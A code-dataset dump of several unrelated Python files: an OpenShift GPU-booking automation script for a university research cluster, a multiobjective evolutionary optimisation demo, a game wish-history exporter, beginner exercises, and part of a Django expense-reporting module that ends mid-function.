project {project_id}

    '\n\n try:\n # Patch DeploymentConfig\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'template': {\n 'spec': {\n 'containers': [\n {\n \"name\": app_id,\n \"resources\": {\n \"requests\": {\"nvidia.com/gpu\": 1},\n \"limits\": {\"nvidia.com/gpu\": 1}\n }\n }\n ]\n }\n }\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU limits of *{app_id}* in *{project_id}* set to *1*'\n email = email + f'The GPU was successfully enabled for your workspace {app_id} in your project {project_id}. You can restart the workspace if needed, and start using the GPU.

    '\n\n except Exception as err:\n # Error when editing DeploymentConfig\n logs = logs + f'⚠️ Could not change the GPU limits for *{app_id}* in *{project_id}*. Error: {str(err)[:21]}'\n email = email + f'The workspace provided {app_id} was not found in the project {project_id}, hence the GPU could not be enabled automatically. You will need to enable it by yourself.'\n\n except Exception as err:\n # Error when editing GPU quota\n logs = logs + f'❌ Could not set the GPU quota to 1 in *{project_id}*. Error: {str(err)[:21]}\\n'\n email = email + f'The project provided {project_id} was not found, hence the GPU could not be enabled. Contact the DSRI team on Slack or via DSRI-SUPPORT-L@maastrichtuniversity.nl
    '\n\n return logs, email\n\n # with oc.project(project_id), oc.timeout(10*60):\n # log.info(f\"✅ Found the project {oc.get_project_name()}, enabling GPU\")\n # Change GPU quota to 1, and enable the GPU in the pod\n # cmds = [\n # \"\"\"oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 1}}}' -n \"\"\" + project_id,\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/template/spec/containers/0/resources\", \"value\": {\"requests\": {\"nvidia.com/gpu\": 1}, \"limits\": {\"nvidia.com/gpu\": 1}}}]' -n \"\"\" + project_id,\n # ]\n # for cmd in cmds:\n # # os.system(cmd)\n # # log.info(subprocess.run(cmd.split(' '), capture_output=subprocess.PIPE).stdout.decode('utf-8'))\n # # log.info(subprocess.run(cmd.split(' '), capture_output=True))\n # log.info(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT))\n\n # return f\"🚀✅ Successfully enabled GPU for {app_id} in {project_id}\"\n\n\ndef check_gpu_bookings() -> None:\n log.info(f'🔎 Checking GPU reservations to send booking notifications on the {datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")}')\n\n # Connect to the SQL DB\n engine = create_engine(settings.SQL_URL)\n SQLModel.metadata.create_all(engine)\n\n # Connect to the OpenShift cluster\n dyn_client, k8s_client, kubeConfig = oc_login()\n\n # Query the SQL DB to get the GPU reservations\n # And send msgs if reservations starts/ends\n with Session(engine) as session:\n statement = select(GpuBooking)\n results = session.exec(statement).all()\n\n for resa in results:\n try:\n resa = jsonable_encoder(resa)\n start_date = datetime.datetime.fromisoformat(resa['starting_date']).date()\n end_date = datetime.datetime.fromisoformat(resa['ending_date']).date()\n\n # Check GPU booking ending tomorrow (we stop it at end_date + 1)\n if end_date == datetime.date.today():\n email_msg = f\"\"\"⚠️ Your GPU booking in project {resa[\"project_id\"]} will end tomorrow at 9:00am!

    \nMake sure you have properly moved all data you want to keep in the persistent folder, as the pod will be restarted automatically.\n\"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking ending tomorrow\")\n\n\n # Check if GPU booking end date +1 day is today (since we switch in the morning, it prevents losing a day)\n if end_date + datetime.timedelta(days=1) == datetime.date.today():\n email_msg = f\"\"\"⚠️ Your GPU booking in project {resa[\"project_id\"]} just ended, and the access to the GPU in your project has been disabled

    \"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking ended\")\n# slack_msg = f'📀 🛬 Booking ends: *GPU {resa[\"gpu_id\"]}* in project *{resa[\"project_id\"]}* for {resa[\"user_email\"]} on the {datetime.date.today()}\\n'\n# slack_msg = slack_msg + \"\"\"```\n# oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 0}}}' -n \"\"\" + resa['project_id'] + \"\"\"\n# ```\"\"\"\n slack_msg = disable_gpu(resa[\"project_id\"], resa[\"app_id\"], dyn_client)\n slack_msg = f\"\"\"🚀🔌 Disabling the GPU for {resa[\"user_email\"]} in *{resa[\"project_id\"]}* (from {start_date} and {end_date}):\\n\"\"\" + slack_msg\n post_msg_to_slack(slack_msg)\n\n\n # Check GPU booking starting\n if start_date == datetime.date.today():\n slack_msg, email_logs = enable_gpu(resa[\"project_id\"], resa[\"app_id\"], dyn_client)\n slack_msg = f\"\"\"🚀🔋 Enabling the GPU for {resa[\"user_email\"]} in *{resa[\"project_id\"]}* (from {start_date} to {end_date}):\\n\"\"\" + slack_msg\n email_msg = f\"\"\"✅ Your GPU booking in project {resa[\"project_id\"]} just started!

    \n{email_logs}
    \nFor more details, checkout the documentation to see how to enable or use the GPU: https://dsri.maastrichtuniversity.nl/docs/deploy-on-gpu

    \nThe GPU will be automatically disabled at the end of your booking on the {end_date} at 9:00am\n\"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking starting\")\n post_msg_to_slack(slack_msg)\n\n except Exception as err:\n log.error(err)\n\n\n\ndef backup_database() -> None:\n log.info(f'💾 Backing up the SQL database (export to CSV) on the {datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")}')\n\n # Connect to the SQL DB\n engine = create_engine(settings.SQL_URL)\n SQLModel.metadata.create_all(engine)\n DUMP_PATH = '/backup'\n\n with Session(engine) as session:\n date = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n folder_path = f'{DUMP_PATH}/dsri-db_{date}'\n pathlib.Path(folder_path).mkdir(parents=True, exist_ok=True)\n\n # Dump GPU bookings\n outfile = open(f'{folder_path}/dsri-db_{date}_gpu-booking.csv', 'w')\n writer = csv.writer(outfile)\n statement = select(GpuBooking)\n results = session.exec(statement).all()\n [writer.writerow([getattr(curr, column.name) for column in GpuBooking.__mapper__.columns]) for curr in results]\n outfile.close()\n\n # Dump Users\n outfile = open(f'{folder_path}/dsri-db_{date}_users.csv', 'w')\n writer = csv.writer(outfile)\n statement = select(User)\n results = session.exec(statement).all()\n [writer.writerow([getattr(curr, column.name) for column in User.__mapper__.columns]) for curr in results]\n outfile.close()\n\n log.info(f'✅ Database backed up successfully on the {date}')\n\n\n\n# Just here as an example, but not really used in practice\n# pip install scholarly\n\n# def get_publications_about_dsri() -> None:\n# # will paginate to the next page by default\n# pubs = scholarly.search_pubs(\"This research was made possible, in part, using the Data Science Research Infrastructure (DSRI) hosted at Maastricht University\")\n# valid_pubs = []\n# limit = 20\n# for i, pub in enumerate(pubs):\n# if i >= limit:\n# break\n# if 'data science research infrastructure' in pub['bib']['abstract'].lower():\n# if 'dsri' in pub['bib']['abstract'].lower():\n# if 'maastricht university' in pub['bib']['abstract'].lower():\n# valid_pubs.append({\n# 'title': pub['bib']['title'],\n# 'authors': ', '.join(pub['bib']['author']),\n# 'pub_year': pub['bib']['pub_year'],\n# 'venue': pub['bib']['venue'],\n# 'abstract': pub['bib']['abstract'],\n# 'url': pub['pub_url'],\n# })\n# print(json.dumps(valid_pubs, indent=2))\n","repo_name":"MaastrichtU-IDS/dsri-documentation","sub_path":"server/api/automated_tasks.py","file_name":"automated_tasks.py","file_ext":"py","file_size_in_byte":13712,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"31160651011","text":"#!/usr/bin/env python\r\n\r\n\"\"\"Tchebycheff and weighted sum approaches for multiobjective optimization.\r\n\r\nauthor: jussiks\r\n\"\"\"\r\n\r\nfrom optimization import Problem, MOPSolution, WeightedSolution\r\nimport genetic_methods as gm\r\nimport numpy as np\r\nimport math\r\nfrom enum import Enum\r\nimport itertools\r\nimport random\r\nfrom typing import List\r\n\r\n\r\nclass Method(Enum):\r\n tchebycheff = 1\r\n weighted_sum = 2\r\n\r\n\r\ndef g_tchebycheff(solution: WeightedSolution, ref_point):\r\n \"\"\"Returns the value of objective function used in Tchebycheff approach.\r\n\r\n ref_point is the reference point, i.e. the ideal objective vector.\r\n \"\"\"\r\n return max(solution.weights * abs(solution.evaluate() - ref_point))\r\n\r\n\r\ndef g_weighted_sum(solution: WeightedSolution):\r\n \"\"\"Returns the value of objective function used in Weighted Sum approach.\"\"\"\r\n return sum(solution.weights * solution.evaluate())\r\n\r\n\r\ndef fitness_eval(population: List[WeightedSolution], method: Method,\r\n ref_point=None):\r\n \"\"\"Calculates the fitness values for every member of the population.\r\n\r\n Arguments:\r\n population list of WeightedSolutions\r\n method either Method.tchebycheff or Method.weighted_sum\r\n ref_point reference point used in Tchebycheff method (numpy array)\r\n \"\"\"\r\n if method == Method.tchebycheff:\r\n if ref_point is None:\r\n raise ValueError(\"Reference point (ref_point) must be defined when using Tchebycheff approach.\")\r\n for p in population:\r\n p.fitness = g_tchebycheff(p, ref_point)\r\n elif method == Method.weighted_sum:\r\n for p in population:\r\n p.fitness = g_weighted_sum(p)\r\n else:\r\n raise ValueError(\"Method {0} not implemented.\".format(method))\r\n\r\n\r\ndef find_neighbours(population: List[WeightedSolution], count):\r\n \"\"\"Finds a given number of neighbours for each solution in population.\r\n\r\n Calculates nearests neighbours for each member of population using\r\n euclidean distace between weight vectors. Returns a dict where each key\r\n is an individual an value is a list of nearest neighbours of that\r\n individual.\r\n\r\n Arguments:\r\n population list of WeightedSolutions\r\n count how many neigbours to pick\r\n \"\"\"\r\n distances = {p: [] for p in population}\r\n for x, y in itertools.combinations(population, 2):\r\n dis = np.linalg.norm(x.variables - y.variables)\r\n distances[x].append({\"ind\": y, \"distance\": dis})\r\n distances[y].append({\"ind\": x, \"distance\": dis})\r\n # TODO add values in sorted order so we don't have to sort them\r\n # afterwards\r\n for key in distances:\r\n distances[key] = sorted(\r\n distances[key], key=lambda x: x[\"distance\"])[:count]\r\n return {\r\n key: [x[\"ind\"] for x in distances[key]] for key in distances\r\n }\r\n\r\n\r\ndef generate_next_gen(population: List[WeightedSolution], neighbour_count,\r\n method, ref_point=None, mutation_probability=0.01):\r\n \"\"\"Returns next generation of solutions\"\"\"\r\n\r\n # Find neigbours\r\n neighbour_dict = find_neighbours(population, neighbour_count)\r\n next_gen = []\r\n\r\n for solution in neighbour_dict:\r\n # Pick two random parents from neigbours\r\n x, y = random.sample(neighbour_dict[solution], 2)\r\n\r\n # Perform crossover, mutation and repair\r\n child_vars = gm.single_point_crossover(x, y)\r\n child = WeightedSolution(x.problem, child_vars, solution.weights)\r\n gm.gaussian_mutation(\r\n child, mutation_probability, [1] * len(child_vars))\r\n gm.repair(child)\r\n next_gen.append(child)\r\n return next_gen\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Objective function.\r\n func = lambda x: [\r\n sum(-10.0 * math.exp(-0.2 * math.sqrt(\r\n x[i]**2 + x[i + 1]**2)) for i in range(2)),\r\n sum(abs(x[i])**0.8 + 5 * math.sin(x[i]**3) for i in range(3))\r\n ]\r\n # Minimum and maximum values for input vectors\r\n constraints = [(-5, 5) for i in range(3)]\r\n problem = Problem(func, variable_bounds=constraints)\r\n var_generator = lambda: [\r\n random.uniform(low, high) for (low, high) in constraints]\r\n\r\n sol_count = 12\r\n\r\n # initial solutions\r\n solutions = [\r\n WeightedSolution(\r\n problem,\r\n var_generator(),\r\n [0 + i / sol_count, 1 - i / sol_count])\r\n for i in range(sol_count)\r\n ]\r\n\r\n # Reference point used in Tchebycheff method\r\n z_star = np.array([-20, -12])\r\n\r\n # Number of neigbours picked in neigbour selection.\r\n neighbour_count = 4\r\n\r\n print(\"\\n{0} nearest neighbours for each individual using euclidean distance:\".format(\r\n neighbour_count))\r\n neighbour_dict = find_neighbours(solutions, neighbour_count)\r\n for solution in neighbour_dict:\r\n print(solution)\r\n for neighbour in neighbour_dict[solution]:\r\n print(\"\\t{0}\".format(neighbour))\r\n\r\n fitness_eval(solutions, Method.tchebycheff, ref_point=z_star)\r\n print(\"\\nTchebycheff function values for each individual:\")\r\n for s in solutions:\r\n print(\"{0}\\t{1}\".format(s, s.fitness))\r\n\r\n fitness_eval(solutions, Method.weighted_sum, ref_point=z_star)\r\n print(\"\\nWeighted sum function values for each individual:\")\r\n for s in solutions:\r\n print(\"{0}\\t{1}\".format(s, s.fitness))\r\n\r\n next_gen = generate_next_gen(\r\n solutions, neighbour_count, Method.tchebycheff, ref_point=z_star,\r\n mutation_probability=0.1)\r\n print(\"\\nNext generation using Tchebycheff:\")\r\n for s in next_gen:\r\n print(s)\r\n\r\n next_gen = generate_next_gen(\r\n solutions, neighbour_count, Method.weighted_sum,\r\n mutation_probability=0.1)\r\n print(\"\\nNext generation using weighted sums:\")\r\n for s in next_gen:\r\n print(s)\r\n","repo_name":"jussiks/optimization","sub_path":"optimization/moea_d.py","file_name":"moea_d.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22191085421","text":"import json\nimport time\nimport requests\nfrom urllib import parse\nimport os\nimport re\nimport shutil\nfrom config import config, gachaTypeDict\nfrom time import sleep\nimport traceback\nfrom utils import logger\nfrom path import DataPath\n\n\nclass Genshan:\n def __init__(self, url, wishTypes) -> None:\n self.url = self.toApi(url)\n self.wishTypes = wishTypes\n\n def toApi(self, url):\n\n logger.debug(url)\n\n spliturl = str(url).split(\"?\")\n if \"webstatic-sea\" in spliturl[0] or \"hk4e-api-os\" in spliturl[0]:\n spliturl[\n 0\n ] = \"https://hk4e-api-os.mihoyo.com/event/gacha_info/api/getGachaLog\"\n else:\n spliturl[0] = \"https://hk4e-api.mihoyo.com/event/gacha_info/api/getGachaLog\"\n url = \"?\".join(spliturl)\n return url\n\n def checkApi(self):\n if \"?\" not in self.url:\n logger.error(\"invalid url\")\n return False\n\n try:\n r = requests.get(self.url)\n s = r.content.decode(\"utf-8\")\n j = json.loads(s)\n except Exception:\n logger.error(traceback.format_exc())\n return False\n\n logger.debug(j)\n\n if not j[\"data\"]:\n logger.warning(j[\"message\"])\n return False\n return True\n\n def getApi(self, gachaType, size, page, end_id=\"\"):\n parsed = parse.urlparse(self.url)\n querys = parse.parse_qsl(str(parsed.query))\n param_dict = dict(querys)\n param_dict[\"size\"] = size\n param_dict[\"gacha_type\"] = gachaType\n param_dict[\"page\"] = page\n param_dict[\"lang\"] = \"zh-cn\"\n param_dict[\"end_id\"] = end_id\n param = parse.urlencode(param_dict)\n path = str(self.url).split(\"?\")[0]\n api = path + \"?\" + param\n return api\n\n def getGachaLogs(self, gachaTypeId):\n # api 限制一页最大 20\n size = \"20\"\n gachaList = []\n end_id = \"0\"\n for page in range(1, 9999):\n\n logger.info(f\"getting: {gachaTypeDict[gachaTypeId]}, page: {page}\")\n\n api = self.getApi(gachaTypeId, size, page, end_id)\n r = requests.get(api)\n s = r.content.decode(\"utf-8\")\n j = json.loads(s)\n gacha = j[\"data\"][\"list\"]\n if not len(gacha):\n break\n for i in gacha:\n gachaList.append(i)\n end_id = j[\"data\"][\"list\"][-1][\"id\"]\n sleep(0.5)\n\n return gachaList\n\n def mergeData(self, localData, gachaData):\n for type in gachaTypeDict:\n localGachaLog = []\n thisGachaLog = []\n try:\n localGachaLog = localData[\"gachaLog\"][type]\n thisGachaLog = gachaData[\"gachaLog\"][type]\n except:\n pass\n if thisGachaLog == localGachaLog:\n pass\n else:\n flag = [1] * len(thisGachaLog)\n loc = [[i[\"time\"], i[\"name\"]] for i in localGachaLog]\n for i in range(len(thisGachaLog)):\n gachaGet = thisGachaLog[i]\n get = [gachaGet[\"time\"], gachaGet[\"name\"]]\n if get in loc:\n pass\n else:\n flag[i] = 0\n\n tempData = []\n for i in range(len(thisGachaLog)):\n if flag[i] == 0:\n gachaGet = thisGachaLog[i]\n tempData.insert(0, gachaGet)\n logger.info(\n \"merge {} added: {}\".format(gachaTypeDict[type], len(tempData))\n )\n for i in tempData:\n localData[\"gachaLog\"][type].insert(0, i)\n\n return localData\n\n def load(self):\n if not self.checkApi():\n return\n\n self.startTime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n\n gachaData = {}\n gachaData[\"gachaLog\"] = {}\n for gachaTypeId in self.wishTypes:\n gachaLog = self.getGachaLogs(gachaTypeId)\n gachaData[\"gachaLog\"][gachaTypeId] = gachaLog\n\n uid_flag = 1\n for gachaType in gachaData[\"gachaLog\"]:\n for log in gachaData[\"gachaLog\"][gachaType]:\n if uid_flag and log[\"uid\"]:\n gachaData[\"uid\"] = log[\"uid\"]\n uid_flag = 0\n\n self.uid = gachaData[\"uid\"]\n localDataFilePath = os.path.join(DataPath, f\"gachaData-{self.uid}.json\")\n\n if os.path.isfile(localDataFilePath):\n with open(localDataFilePath, \"r\", encoding=\"utf-8\") as f:\n localData = json.load(f)\n self.data = self.mergeData(localData, gachaData)\n else:\n self.data = gachaData\n\n self.data[\"gachaType\"] = gachaTypeDict\n\n def save(self):\n # 抽卡报告读取 gachaData.json\n # with open(os.path.join(DataPath, \"gachaData.json\"), \"w\", encoding=\"utf-8\") as f:\n # json.dump(mergeData, f, ensure_ascii=False, sort_keys=False, indent=4)\n # 待合并数据 gachaData-{uid}.json\n with open(\n os.path.join(DataPath, f\"gachaData-{self.uid}.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(self.data, f, ensure_ascii=False, sort_keys=False, indent=4)\n # 备份历史数据 gachaData-{uid}-{self.startTime}.json\n with open(\n os.path.join(DataPath, f\"gachaData-{self.uid}-{self.startTime}.json\"),\n \"w\",\n encoding=\"utf-8\",\n ) as f:\n json.dump(self.data, f, ensure_ascii=False, sort_keys=False, indent=4)\n\n if config.getKey(\"auto_archive\"):\n logger.info(\"archive files\")\n archive_path = os.path.join(DataPath, \"archive\")\n if not os.path.exists(archive_path):\n os.mkdir(archive_path)\n\n logger.debug(\"archive path: {}\".format(archive_path))\n\n files = os.listdir(DataPath)\n archive_UIGF = [\n f for f in files if re.match(r\"UIGF_gachaData-\\d+-\\d+.json\", f)\n ]\n archive_json = [f for f in files if re.match(r\"gachaData-\\d+-\\d+.json\", f)]\n archive_xlsx = [\n f for f in files if re.match(r\"gachaExport-\\d+-\\d+.xlsx\", f)\n ]\n archive_files = archive_UIGF + archive_json + archive_xlsx\n\n logger.debug(\"files: {}\".format(archive_files))\n\n for file in archive_files:\n try:\n shutil.move(os.path.join(DataPath, file), archive_path)\n logger.info(\"done: {}\".format(file))\n except Exception:\n logger.error(\"failed: {}\".format(file))\n logger.debug(traceback.format_exc())\n try:\n os.remove(os.path.join(archive_path, file))\n except:\n pass\n\n def export(self):\n if config.getKey(\"export_uigf_json\"):\n import export_uigf\n\n export_uigf.write(self.uid, self.data, self.startTime)\n\n if config.getKey(\"export_xlsx\"):\n import export_xlsx\n\n export_xlsx.write(self.uid, self.data, self.startTime)\n\n if config.getKey(\"export_html\"):\n import export_html\n\n export_html.write(self.uid, self.data)\n\n def main(self):\n logger.info(\"start\")\n self.load()\n self.save()\n self.export()\n\n\nif __name__ == \"__main__\":\n gs = Genshan(config.getKey(\"url\"), config.getKey(\"wish_types\"))\n\n gs.main()\n","repo_name":"ipuppet/genshin-gacha-export","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28132526081","text":"\"\"\" numero1=20\nnumero2=10\nif numero1 == 10 and numero2 == 10:\n print('Ambos valores son iguales')\nelse:\n print('Ambos valores no son iguales')\n \"\"\"\n\n\"\"\" numero1=10\nnumero2=10\nif numero1 == 10 or numero2 == 10:\n print('Al menos un valor es 10')\nelse:\n print('Ningun valor es 10') \"\"\"\n\nvalor1=True\nvalor2=not True\n\nprint(valor1, valor2)","repo_name":"YOYO-DR/Python","sub_path":"Curso de Python - INFORMATICONFIG/9_OperadoresAndOrNot.py","file_name":"9_OperadoresAndOrNot.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20400390004","text":"s = cont= 0\nmaior = menor = 0\nbarato = ' '\nwhile True:\n print('-+='*20,'')\n print(' MEGA SUPERMERCADO ')\n print('-+='*20,'')\n produto = str(input('Nome do Produto: '))\n preco = float(input('Preço: R$ '))\n print('-+='*20,'')\n \n if preco > 1000: # Se o produto é mais de 1000\n cont +=1\n\n if cont == 1: #primeiro preço\n maior = preco\n menor = preco\n barato = produto\n\n else:\n if preco > maior: # maior preço\n maior = preco\n if preco < menor: # menor preço\n menor = preco\n barato = produto\n\n resp = ' '\n s += preco # somando os preços dos produtos\n while resp not in 'SN':\n resp = str(input('Quer continuar? [S/N] | ')).strip().upper()[0]\n if resp == 'N':\n break\n \nprint('-+='*20,'')\nprint(f'O Total da compra foi R$ {s:.2f}')\nprint(f'Temos {cont} produtos custando mais de R$1000.00')\nprint(f'O produto mais barato foi {barato} que custa R${menor}')\nprint(f'O produto mais caro foi R${maior} ')\nprint('-+='*20,'')\n","repo_name":"jailsonjhonatas/Desafios-Python","sub_path":"estatistica_em_produtos.py","file_name":"estatistica_em_produtos.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43296446049","text":"# โปรแกรมแลกธนบัตร\r\n# แลกเงินและหาจำนวนของแบงค์\r\n\r\n# 2000 => 1000 => สองใบ\r\n# 1500 => 1000 => หนึ่งใบ, 500 => หนึ่งใบ\r\n\r\nNumber = int(input('ป้อนจำนวนเงินของคุณ :'))\r\n\r\nif Number >= 1000:\r\n print('1000 บาท',Number//1000,'ใบ')\r\n Number = Number % 1000 # 1500 % 1000 หารเอาเศษ = 500\r\nif Number >=500:\r\n print('500บาท',Number//500,'ใบ') # % = หารเอาเศษ\r\n Number = Number % 500\r\nif Number >= 100:\r\n print('100 บาท',Number//100,'ใบ')\r\n Number = Number % 100\r\nif Number >= 50:\r\n print('50 บาท',Number//50,'ใบ')\r\n Number = Number % 50\r\nif Number >= 20:\r\n print('20 บาท',Number//20,'ใบ')\r\n Number = Number % 20\r\n","repo_name":"JengJeng7/Python_code_Basic","sub_path":"EP.22 โปรแกรมแยกธนบัตร.py","file_name":"EP.22 โปรแกรมแยกธนบัตร.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27525764296","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom eventos.models import evento\nfrom gastos.models import gasto\nfrom django.contrib.auth.decorators import login_required\nfrom decimal import Decimal \nimport re\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import landscape\nfrom reportlab.lib import colors\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.platypus.tables import Table, TableStyle\nfrom django.utils import timezone\n\n\n\n\n\n\n#-----------------------------APARTADO DE MODULO DE EVENTOS---------------------------------------------\n#----------------------------------------------------------------------------------------------------------------------\n\n\n@login_required(login_url=\"auth/login/\")\ndef generar_pdf_gasto(request, gasto_id):\n try:\n gasto_seleccionado = gasto.objects.get(pk=gasto_id)\n except gasto.DoesNotExist:\n return HttpResponse('El gasto no existe')\n\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"gasto_{gasto_seleccionado.id}.pdf'\n\n doc = SimpleDocTemplate(response, pagesize=landscape(letter))\n\n styles = getSampleStyleSheet()\n style_title = styles['Title']\n style_body = styles['Normal']\n\n elements = []\n\n fecha_actual = timezone.now().strftime(\"%Y-%m-%d\")\n\n\n elements.append(Paragraph('COMUNIDAD ISLÁMICA ALDAAWA', style_title))\n elements.append(Paragraph('Gastos', style_title))\n elements.append(Spacer(1, 12))\n\n content = [\n [Paragraph('Evento:', style_body), gasto_seleccionado.eventoa.titulo],\n [Paragraph('Presupuesto:', style_body), f'Q. {gasto_seleccionado.presupuesto} °°'],\n [Paragraph('Transporte:', style_body), f'Q. {gasto_seleccionado.transporte} °°'],\n [Paragraph('Personal:', style_body), f'Q. {gasto_seleccionado.personal} °°'],\n [Paragraph('Combustible:', style_body), f'Q. {gasto_seleccionado.combustible} °°'],\n [Paragraph('Alquiler:', style_body), f'Q. {gasto_seleccionado.alquiler} °°'],\n [Paragraph('Viáticos:', style_body), f'Q. {gasto_seleccionado.viaticos} °°'],\n [Paragraph('Donaciones:', style_body), f'Q. {gasto_seleccionado.donaciones} °°'],\n [Paragraph('Otros:', style_body), f'Q. {gasto_seleccionado.otros} °°'],\n [Paragraph('Total Gastado:', style_body), f'Q. {gasto_seleccionado.residuo} °°'],\n [Paragraph('Sobrante:', style_body), f'Q. {gasto_seleccionado.totalgastado} °°'],\n ]\n\n elements.append(Paragraph(f'Fecha de Impresión: {fecha_actual}'))\n elements.append(Paragraph('_'))\n\n table = Table(content)\n table.setStyle(TableStyle([\n ('BACKGROUND', (0, 0), (-1, 0), colors.grey),\n ('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),\n ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n ('FONTNAME', (0, 0), (-1, 0), 'Helvetica'),\n ('BOTTOMPADDING', (0, 0), (-1, 0), 12),\n ('BACKGROUND', (0, 1), (-1, -1), colors.beige),\n ('GRID', (0, 0), (-1, -1), 1, colors.black)\n ]))\n\n elements.append(table)\n\n doc.build(elements)\n\n return response\n\n#Lista los Eventos ya creados en la base de datos\n@login_required(login_url=\"auth/login/\")\ndef list_gastos(request):\n query = request.GET.get('q', '')\n gastos = gasto.objects.filter( \n Q(eventoa__titulo__icontains=query) \n )\n context = {\n \"active_icon\": \"gastos\",\n \"gastos\":gastos,\n \"query\": query,\n }\n return render(request, \"gasto/gastos.html\", context)\n\n\n\n\n\n\n@login_required(login_url=\"auth/login/\")\ndef eliminar_gastos(request, gasto_id):\n try:\n Gasto = gasto.objects.get(pk=gasto_id)\n Gasto.delete()\n messages.success(request, '¡Gasto eliminado!', extra_tags=\"success\")\n return redirect('gastos:list_gasto') \n except Exception as e:\n messages.error(request, '¡Hubo un error durante la eliminación!' + str(e), extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n \n\n\n\n\n\n#Agrega a la base de datos los Eventos, funcion para insertar \n@login_required(login_url=\"auth/login/\")\ndef agregar_gasto(request):\n eventos = evento.objects.all()\n\n if request.method == 'POST':\n data = request.POST\n\n evento_id = data.get('evento')\n\n # Verificar si ya existe un gasto asociado al evento\n if gasto.objects.filter(eventoa__id=evento_id).exists():\n messages.error(request, 'Ya existe un gasto registrado para este evento.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n # Elimina \"Q.\" de los valores ingresados\n presupuesto = re.sub(r'[^\\d.]', '', data.get('presupuesto'))\n transporte = re.sub(r'[^\\d.]', '', data.get('transporte'))\n personal = re.sub(r'[^\\d.]', '', data.get('personal'))\n combustible = re.sub(r'[^\\d.]', '', data.get('combustible'))\n alquiler = re.sub(r'[^\\d.]', '', data.get('alquiler'))\n viaticos = re.sub(r'[^\\d.]', '', data.get('viaticos'))\n donaciones = re.sub(r'[^\\d.]', '', data.get('donaciones'))\n otros = re.sub(r'[^\\d.]', '', data.get('otros'))\n\n # Validación de los valores ingresados\n if not presupuesto or \\\n not transporte or \\\n not personal or \\\n not combustible or \\\n not alquiler or \\\n not viaticos or \\\n not donaciones or \\\n not otros:\n messages.error(request, 'Los valores ingresados deben ser numéricos.', extra_tags=\"danger\")\n return redirect('gastos:gastos')\n\n # Convertir los valores a números de punto flotante\n presupuesto = float(presupuesto)\n transporte = float(transporte)\n personal = float(personal)\n combustible = float(combustible)\n alquiler = float(alquiler)\n viaticos = float(viaticos)\n donaciones = float(donaciones)\n otros = float(otros)\n\n evento_obj = evento.objects.get(pk=evento_id)\n\n # Calcula el totalgastado y residuo\n totalgastado = presupuesto - (transporte + personal + combustible + alquiler + viaticos + donaciones + otros)\n residuo = presupuesto - totalgastado\n\n nuevo_evento = gasto(\n eventoa=evento_obj,\n presupuesto=presupuesto,\n transporte=transporte,\n personal=personal,\n combustible=combustible,\n alquiler=alquiler,\n viaticos=viaticos,\n donaciones=donaciones,\n otros=otros,\n totalgastado=totalgastado,\n residuo=residuo\n )\n nuevo_evento.save()\n\n messages.success(request, 'Gasto creado con éxito!', extra_tags=\"success\")\n return redirect('gastos:gastos')\n\n return render(request, \"gasto/agregar_gasto.html\", {\n 'eventos': eventos,\n })\n\n\n\n\n\n\n\n\n\n\n\n#Actualiza un gasto de un evento realizado en la mezquita aldaawa\n@login_required(login_url=\"auth/login/\")\ndef actualizar_gasto(request, gasto_id):\n eventos = evento.objects.all()\n\n try:\n gasto_obj = gasto.objects.get(pk=gasto_id)\n\n if request.method == 'POST':\n data = request.POST.copy() # Crea una copia mutable de request.POST\n\n evento_id = data.get('evento')\n\n if gasto_obj.eventoa.id != int(evento_id):\n # Verifica si ya existe un gasto asociado al nuevo evento\n if gasto.objects.filter(eventoa__id=evento_id).exclude(id=gasto_obj.id).exists():\n messages.error(request, 'Ya existe un gasto registrado para este evento.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n evento_obj = evento.objects.get(pk=evento_id)\n gasto_obj.eventoa = evento_obj\n\n # Reemplaza comas con puntos en los valores\n for key in 